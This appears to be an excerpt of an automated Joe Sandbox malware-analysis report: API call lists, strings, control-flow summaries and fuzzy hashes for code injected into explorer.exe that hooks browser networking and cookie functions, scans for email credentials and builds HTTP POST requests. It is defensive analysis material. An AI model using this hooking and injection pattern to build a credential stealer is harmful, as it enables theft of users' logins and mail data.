                                                        • GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                        • Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
                                                        • Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                        • Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21

                                                        Control-flow Graph

                                                        control_flow_graph 284 82999-829a3 call 827e2 287 829b5-829b6 284->287 288 829a5-829af GetProcessHeap HeapFree 284->288 288->287
                                                        APIs
                                                          • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
                                                        • HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                        • String ID:
                                                        • API String ID: 2580854192-0
                                                        • Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                        • Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
                                                        • Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                        • Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
                                                        • RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
                                                        • StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
                                                        • StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
                                                        • StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
                                                        • StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
                                                        • StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapMove$AllocateProcessZero
                                                        • String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
                                                        • API String ID: 1061763166-3069160855
                                                        • Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                        • Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
                                                        • Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                        • Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792

                                                        Control-flow Graph
                                                        • Function 00081972 (interactive graph with executed / not executed node colouring not reproduced; the API calls it reaches are listed below)
                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
                                                        • RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
                                                        • StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
                                                        • StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
                                                        • StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
                                                        • StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
                                                        • StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
                                                        • lstrlenW.KERNEL32(00000000), ref: 00081BD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapMove$AllocateProcessZerolstrlen
                                                        • String ID: .pst$;$<$Blob$Pop$SMTP$from
                                                        • API String ID: 76385412-3831209991
                                                        • Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                        • Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
                                                        • Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                        • Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791

                                                        Control-flow Graph
                                                        • Function 000820A7 (interactive graph with executed / not executed node colouring not reproduced; the API calls it reaches are listed below)
                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                          • Part of subcall function 00082938: lstrlen.KERNEL32(0065AE26,?,00000000,00000000,000820E3,75712B62,0065AE26,00000000), ref: 00082940
                                                          • Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0065AE26,00000001,00000000,00000000), ref: 00082952
                                                          • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
                                                        • wsprintfW.USER32 ref: 00082278
                                                        • wsprintfW.USER32 ref: 000822E3
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                        • API String ID: 4204651544-1701262698
                                                        • Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                        • Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
                                                        • Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                        • Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52

                                                        Control-flow Graph
                                                        • Function 00081ECE (interactive graph with executed / not executed node colouring not reproduced; the API calls it reaches are listed below)
                                                        APIs
                                                        • StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
                                                        • RtlMoveMemory.NTDLL(?,?), ref: 00081F22
                                                        • StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
                                                        • StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
                                                        • StrStrIA.SHLWAPI(?,?), ref: 00081F57
                                                        • lstrlen.KERNEL32(00000000), ref: 00081F64
                                                        • lstrlen.KERNEL32(00000000), ref: 00081F9D
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMovelstrlen
                                                        • String ID:
                                                        • API String ID: 456560858-0
                                                        • Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                        • Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
                                                        • Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                                        • Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2
                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
                                                        • CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
                                                        • lstrcmpi.KERNEL32(00000000,0065C16C), ref: 00081E81
                                                        • lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
                                                        • RtlMoveMemory.NTDLL(0065C16C,00000000,00000000), ref: 000826A2
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                        • String ID:
                                                        • API String ID: 2826435453-0
                                                        • Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                        • Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
                                                        • Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                                        • Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081966
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941
                                                          • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                          • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
                                                        • String ID:
                                                        • API String ID: 3402831612-0
                                                        • Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                        • Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
                                                        • Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                                        • Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770

                                                        Execution Graph

                                                        Execution Coverage: 6.6%
                                                        Dynamic/Decrypted Code Coverage: 100%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 223
                                                        Total number of Limit Nodes: 16
                                                        • Interactive execution graph not reproduced. APIs referenced by its nodes: GetProcessHeap, RtlAllocateHeap, HeapFree, VirtualAlloc, VirtualFree, VirtualQuery, RtlMoveMemory, RtlZeroMemory, memcpy, lstrlen, lstrcat, wsprintfA, wsprintfW, StrToIntA, MultiByteToWideChar, CryptBinaryToStringA, RtlEnterCriticalSection, RtlLeaveCriticalSection, CreateThread, CloseHandle, RtlExitUserThread

                                                        Callgraph
                                                        • Interactive callgraph (executed / not executed, opacity by relevance, disassembly links) not reproduced; it covers the functions of the dumped code region at offset 00081000 whose control-flow graphs and API lists appear in this section

                                                        Control-flow Graph
                                                        • Function 00083862 (interactive graph with executed / not executed node colouring not reproduced). APIs referenced by its nodes: GetModuleFileNameA, GetCurrentProcessId, wsprintfA, CreateMutexA, GetLastError, RtlInitializeCriticalSection, PathFindFileNameA, lstrcat, Sleep, lstrcmpi, GetCommandLineW, CommandLineToArgvW, GetCommandLineA, StrStrIA, GetModuleHandleA, GetProcAddress, RtlExitUserThread, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00083886
                                                        • GetCurrentProcessId.KERNEL32(00000001), ref: 0008389B
                                                        • wsprintfA.USER32 ref: 000838B6
                                                          • Part of subcall function 0008118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                          • Part of subcall function 0008118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                          • Part of subcall function 0008118D: lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                          • Part of subcall function 0008118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                          • Part of subcall function 0008118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                          • Part of subcall function 0008118D: wsprintfA.USER32 ref: 00081205
                                                          • Part of subcall function 0008118D: CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                          • Part of subcall function 0008118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000838CD
                                                        • GetLastError.KERNEL32 ref: 000838D3
                                                        • RtlInitializeCriticalSection.NTDLL(00086038), ref: 000838F3
                                                        • PathFindFileNameA.SHLWAPI(?), ref: 000838FA
                                                        • lstrcat.KERNEL32(00085CDE,00000000), ref: 00083910
                                                        • Sleep.KERNEL32(000001F4), ref: 0008392A
                                                        • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 0008393C
                                                        • GetCommandLineW.KERNEL32(?), ref: 0008394F
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0008397E
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083987
                                                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 000839AF
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839B2
                                                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 000839C4
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839C7
                                                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 000839E1
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839E4
                                                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 000839EC
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000839EF
                                                        • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00083A6D
                                                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A78
                                                        • StrStrIA.SHLWAPI(00000000), ref: 00083A7B
                                                        • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00083A8E
                                                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A9D
                                                        • StrStrIA.SHLWAPI(00000000), ref: 00083AA0
                                                        • GetModuleHandleA.KERNEL32(opera.dll), ref: 00083ABF
                                                        • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00083ACC
                                                        • CommandLineToArgvW.SHELL32(00000000), ref: 00083956
                                                          • Part of subcall function 000816C7: GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                          • Part of subcall function 000816C7: GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                          • Part of subcall function 000816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                          • Part of subcall function 000816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                          • Part of subcall function 000816C7: CloseHandle.KERNEL32(00000000), ref: 00081758
                                                        • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00083A10
                                                        • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00083A20
                                                        • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00083A30
                                                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A47
                                                        • StrStrIA.SHLWAPI(00000000), ref: 00083A4A
                                                        • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00083A5F
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00083B2C
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B35
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00083B52
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B55
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00083B72
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B75
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00083B99
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083B9C
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00083BA9
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083BAC
                                                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00083BB9
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00083BBC
                                                          • Part of subcall function 00081C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00081C42
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 00083BD9
                                                        • wsprintfA.USER32 ref: 00083C1F
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                        • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                        • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                        • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                        • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                        • API String ID: 2480436012-2618538661
                                                        • Opcode ID: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                        • Instruction ID: 4080beb071130776e6dd09e7f3c374191be514a04634faf7e68f9b4ce61aff03
                                                        • Opcode Fuzzy Hash: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                        • Instruction Fuzzy Hash: AEA1D370A40716A7E71077719C49E6F3A9CBF91B41B120524F6C1AB292EF79C9028FA6

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00083DAF
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00083DE2
                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00083DEB
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                        • String ID:
                                                        • API String ID: 4050682147-0
                                                        • Opcode ID: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                                        • Instruction ID: dcd502424e309425fe8eb10f29b26712ba654105e7724c8cb1046160188aa2ce
                                                        • Opcode Fuzzy Hash: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                                        • Instruction Fuzzy Hash: 4301D430400601AFDB28BB64EC58BEB3B9CFF85711F118529B5D6871E2CA7B8A41CF65

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                          • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • wsprintfA.USER32 ref: 00083C1F
                                                          • Part of subcall function 00081235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                          • Part of subcall function 00081235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                        • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                        • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00083CA1
                                                        • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00083CB1
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083CC1
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083D12
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00083D68
                                                        • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                        • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                          • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                        • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                        • API String ID: 2509890648-2554907557
                                                        • Opcode ID: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                        • Instruction ID: b3decc60f1b6fd0102e2c0e98a0bf13bb15c07833eab530b9c5dae2245e78d24
                                                        • Opcode Fuzzy Hash: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                        • Instruction Fuzzy Hash: AF41E6316047029BD614BB74EC45ABF37ADBF94B40F000518B9D297192EF39DE068BA6

                                                        Control-flow Graph

                                                        APIs
                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                        • Instruction ID: 31edbaac02ff07a1b824ab005dc06848c6bb7be7fdd6de8e3064e283bb2ae97a
                                                        • Opcode Fuzzy Hash: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                        • Instruction Fuzzy Hash: 5ED017327052327BE3706ABB6C0CF836EDDEF86AE1B014025B649D2150D6608821C7F0

                                                        Control-flow Graph

                                                        APIs
                                                        • UnmapViewOfFile.KERNEL32(00000000,00000000,00083C5E,00000001), ref: 00081265
                                                        • CloseHandle.KERNELBASE(?), ref: 0008126C
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseFileHandleUnmapView
                                                        • String ID:
                                                        • API String ID: 2381555830-0
                                                        • Opcode ID: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                        • Instruction ID: c184eb3bb083f7b6bb603a86e3cff50339feff78dbb80b7db0fead9aac5e1450
                                                        • Opcode Fuzzy Hash: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                        • Instruction Fuzzy Hash: D3B01237419031D7D31427747C0C8CB3E18FF492213028540F24E82011473C08419FF5

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.624471075.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                        • Instruction ID: 4deb57588eb96029a35becf2c55eca230ebc00b67c115c5e18b133d903a3b778
                                                        • Opcode Fuzzy Hash: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                        • Instruction Fuzzy Hash: 0EA002B59501115BFE4457E4BD0DB173518B744745F248544738685050A97854148F21

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000820E5
                                                        • RtlMoveMemory.NTDLL(00000000,000850A0,00000016), ref: 0008210C
                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00082134
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00082144
                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0008215E
                                                        • GetLastError.KERNEL32 ref: 00082166
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082174
                                                        • Sleep.KERNEL32(000003E8), ref: 0008217B
                                                        • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00082191
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00082198
                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
